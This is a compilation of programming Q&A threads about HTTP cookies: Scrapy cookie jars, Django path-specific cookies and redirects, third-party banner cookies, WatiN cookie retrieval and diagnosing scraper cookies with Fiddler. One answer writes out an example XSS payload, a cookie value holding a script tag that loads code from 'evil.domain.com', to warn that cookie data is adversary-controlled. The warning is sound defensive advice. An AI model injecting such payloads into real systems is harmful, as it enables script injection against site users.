Scrapy modify cookie - cookies

I'm able to create a cookie with scrapy but unable to modify one existing cookie.
In the ecommerce website i'm working, this cookie handles the postal code and the postal is used by each page to modify product attributes. I can modify the postal code using selenium, scrape every page, but the scrape process is too slow. I wanted to use scrapy only, modifying this request/response postcode cookie.
I can create a cookie on my requests using this code
in SETTINGS.PY
COOKIES_ENABLED = True
in spider.py
yield scrapy.Request(response.urljoin(url), self.parsePage, cookies={'cp': codpost})
I get the list of cookies using:
cookies = response.headers.getlist("Set-Cookie")
The relevant result I get on every page is:
[..., b'cp=28029; Expires=Sun, 29-Feb-2032 07:58:44 GMT; Path=/', ...]
It doesn't look like to be a pair key/value. How can I modify this cookie? Any suggestions?

I don't think you need to manually modify the cookies, you probably can get through using cookiejar.
You can yield several requests for different postal codes, and include a different cookiejar in each request, that way Scrapy will manage different sessions for each request.
for code in postal_code:
yield Request(url, meta={'cookiejar': code}, callback=self.callback_func)
This is a minimal example, just to show how to pass the cookiejar in the request. Keep in mind that the values represented by code must be different for each different session you need.

Related

Path Specific Cookie in Django

i want to create cookie based authentication depends on path ,
so simply for testing i have create two views and set cookies respectively
View 1 Cookie With globalLy available
View 2 Cookie With Specific
But the problem in both view only global cookie is available
View 1
View 2
You can see both cookie have same name but different path, but when we get cookies only global cookie is available
if i display request.META.get('HTTP_COOKIE')) then all cookie are display but not in request.COOKIES.get('last_visit')
please help, i have tested in php , it works fine but not in python django
The problem that you face relates partly to Django, but firstly to the properties of HTTP cookies mechanism itself.
A cookie valid for a path is also valid for all its subpaths (a query string doesn't matter). So last_visit cookie intended for / is also valid for /view2/. For specifics of the matching mechanism, defining whether a cookie is suitable for a path, see subsection "5.1.4. Paths and Path-Match" in RFC6265.
So both cookies are sent, and the order in which they are listed in Cookie: HTTP header is from more specific paths to less specifics ones. See over here in RFC6265.
Now, Django processes cookies from the header one by one and populates a plain python dictionary request.COOKIES, rewriting values when keys are already present. That is how your value for last_visit is rewriten when both cookies for both paths are sent in http request.
While Django processes cookies like that, though it would be more reasonable to only keep the first (not the last) value for the key as it relates to more specific path, you can fix the issue by only using the same cookie names for paths of the same level -- for /root/view1/ and /root/view2/, but not for /root/. Or You can divert cookie names with respect to http path like that:
import hashlib
cookie_name = 'last_visit%s' % hashlib.md5(request.path).hexdigest()
# ...
cookie = request.COOKIES.get(cookie_name)
# ...
response.set_cookie(cookie_name, cookie, path=request.path)

Can I set a cookie in this situation?

I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Django redirect to site root with variable....?

I'm trying to redirect the browser back to the site root and also pass a variable in order to trigger a JS notification function... This is all with Django.
What I have now is this:
urls.py:
url(r'^accounts/password/reset/complete/$', views.passwordResetComplete,
name='password_reset_complete'),
views.py:
def passwordResetComplete(theRequest):
return redirect(home(theRequest, 'Password reset successful'))
def home(theRequest, myMessage=None):
.........
return render_to_response('new/index.html',
{
"myTopbar": myTopbar,
"isLoggedIn": isLoggedIn,
"myMessage": myMessage
},
context_instance=RequestContext(theRequest)
)
I get this error:
NoReverseMatch: Error importing 'Content-Type: text/html; charset=utf-8.......(gives full HTML of page)
I've been working around a few different solutions and nothing seems to work in the way that I need. The closest I've got is to redirect to '/?query-string' with a JS function in root to check for that query-string and run the function if it's present. However, that leaves the query-string in the URL for the duration of the user's navigation of the site (which is 100% AJAX). I want to avoid having any strings/long hrefs in the URL.
Would be really grateful if anyone can tell me how to solve this problem.
HTTP is a stateless protocol, which means that each and every request is entirely unique and separated from anything and everything that has ever been done before. Put more simply, the only way (in HTTP) to "pass a variable" with a URL is to add it to the URL itself (/someobject/1/, for example, where 1 is an object id) or in the querystring (?someobject=1). Either way, the information is embedded in the URL and it's up to your application to decipher that information out of the URL and do something with it.
The concept of a "session" was introduced as a way to provide state to the stateless protocol that is HTTP. The way it works is that the server sends the client a cookie containing some identifiable information (usually, just a session id). Then, the client sends the cookie back to the server in the request headers with every request. The server sees the cookie, looks up the session and continues on seamlessly with whatever is in progress. This is not true state, but it does provide the ability to essentially mimic state, and it's the only way to pass data between requests without actually embedding the data in the URL.
If all you need to return back is a message to the user such as "Password reset successful", you can and should simply use Django's messages framework, which itself uses the session pass the message. It sets a cookie for the client, so that you can redirect to any URL. The cookie will be passed back with the request for that new URL, and Django will add the message from the session into the appropriate place in your template for that URL.
If you need to actually invoke a bit of JavaScript, then you should make the request via AJAX. In the response, you can return any data you want in via JSON (and act on that data however you like) or even return Javascript to be run.
Following the redirect docs, you cannot simply redirect to a view, but only to a url or an object/view that is a assigned to a url already. Thus, you have 2 options:
a) Call the view directly like that:
return home(theRequest, 'Password reset successful')
b) Add a Url patterns like that:
url(r'^your_patterns/$', views.home, msg='',name='home'),
Then you will be able to do what you initally did:
return redirect(views.home,('Password reset successful',))
or from my point of view, even tidier:
return redirect('home',('Password reset successful',))

Getting a list of cookies set using WatiN

Is there a way to get a list of all the cookies set by a website using WatiN?
The IE Browser class in WatiN provides a GetCookie method that allows you to retrieve a specific cookie, but I would like to iterate over all the cookies that have been set.
There are two methods that should allow you to get the cookies:
CookieCollection cookies = _browser.GetCookiesForUrl(new Uri(url));
and
CookieContainer cookies = _browser.GetCookieContainerForUrl(new Uri(url));
But both of these are empty. Also calling the GetCookie method for a specific cookie returns null.
Any suggestions of how to get this to work?
Recently I had to deal with this situation. At first I thought the cookies I was looking for were HttpOnly, but I took a look using WireShark and there was no HttpOnly flag.
Not sure why GetCookieContainerForUrl fails in this case, but a client side script call revealed the cookies were still there:
ie.Eval("document.cookie");
You might want to try that statement before resorting to packet sniffing every time.
Well, I suppose those methods should work as expected, but maybe you are trying to get HttpOnly cookies? Many sites/web frameworks sets this flag for important cookies, especially when it comes to "session id" cookies. You can't read them in WatiN and it's really hard to read them at all. I was looking for solution once and only one I got was article: Retrieve HttpOnly Session Cookie in WebBrowser
If you want to know if the site you are trying to get cookies is setting HttpOnly flag on the cookie, use Fiddler2 and look in response headers.

question about cookie

I'm stuck in a cookie related question. I want to write a program that can automate download the attachments of this forum. So I should maintain the cookies this site send to me. When I send a GET request in my program to the login page, I got the cookie such as Set-Cookie: sso_sid=0589a967; domain=.it168.com in my program. Now if I use a cookie viewer such as cookie monster and send the same GET request, my program get the same result, but the cookie viewer shows that the site also send me two cookies which are:
testcookie http://get2know.it/myimages/2009-12-27_072438.jpg and token http://get2know.it/myimages/2009-12-27_072442.jpg
My question is: Where did the two cookie came from? Why they did not show in my program?
Thanks.
Your best bet to figure out screen-scraping problems like this one is to use Fiddler. Using Fiddler, you can compare exactly what is going over the wire in your app vs. when accessing the site from a browser. I suspect you'll see some difference between headers sent by your app vs. headers sent by the browser-- this will likley account for the difference you're seeing.
Next, you can do one of two things:
change your app to send exactly the headers that the browser does (and, if you do this, you should get exactly the response that a real browser gets).
using Fiddler's "request builder" feature, start removing headers one by one and re-issuing the request. At some point, you'll remove a header which makes the response not match the response you're looking for. That means that header is required. Continue for all other headers until you have a list of headers that are required by the site to yield the response you want.
Personally, I like option #2 since it requires a minimum amount of header-setting code, although it's harder initially to figure out which headers the site requires.
On your actual question of why you're seeing 2 cookies, only the diagnosis above will tell you for sure, but I suspect it may have to do with the mechanism that some sites use to detect clients who don't accept cookies. On the first request in a session, many sites will "probe" a client to see if the client accepts cookies. Typically they'll do this:
if the request doesn't have a cookie on it, the site will redirect the client to a special "cookie setting" URL.
The redirect response, in addition to having a Location: header which does the redirect, will also return a Set-Cookie header to set the cookie. The redirect will typically contain the original URL as a query string parameter.
The server-side handler for the "cookie setter" page will then look at the incoming cookie. If it's blank, this means that the user's browser is set to not accept cookies, and the site will typically redirect the user to a "sorry, you must use cookies to use this site" page.
If, however, there is a cookie header send to the "cookie setter" URL, then the client does in fact accept cookies, and the handler will simply redirect the client back to the original URL.
The original URL, once you move on to the next page, may add an additional cookie (e.g. for a login token).
Anyway, that's one way you could end up with two cookies. Only diagnosis with Fiddler (or a similar tool) will tell you for sure, though.